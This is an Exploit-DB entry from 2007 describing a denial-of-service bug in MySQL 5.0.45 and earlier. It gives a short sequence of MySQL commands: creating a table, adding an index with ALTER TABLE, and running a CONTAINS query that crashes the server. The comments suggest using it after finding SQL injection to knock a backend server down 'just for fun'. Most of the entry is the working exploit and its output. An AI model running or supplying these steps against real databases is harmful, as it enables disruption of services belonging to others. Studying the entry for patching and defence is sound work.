MySQL <= 5.0.45 Alter Denial of Service Vulnerability

ID EDB-ID:4615
Type exploitdb
Reporter Kristian Hermansen
Modified 2007-11-09T00:00:00


MySQL <= 5.0.45 (Alter) Denial of Service Vulnerability. Dos exploits for multiple platform

 * MySQL &lt;=6.0 possibly affected
 * Kristian Erik Hermansen
 * Credit: Joe Gallo
 * You must have ALTER permissions to exploit this bug!
 * Scenario: You found SQL injection, but you want to punch backend server
 * in the nuts just for fun.  Start with the ALTER TABLE statement on
 * a table and field you know to exist.  The first two SQL statements are
 * simply to demostrate reproducibility...

mysql&gt; CREATE TABLE `test` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
  `foo` text NOT NULL
Query OK, 0 rows affected

mysql&gt; SELECT * FROM test WHERE CONTAINS(foo, 'bar');
Empty set

mysql&gt; ALTER TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0  Duplicates: 0  Warnings: 0

mysql&gt; SELECT * FROM test WHERE CONTAINS(foo, 'bar');
ERROR 2013 : Lost connection to MySQL server during query

# [2007-11-09]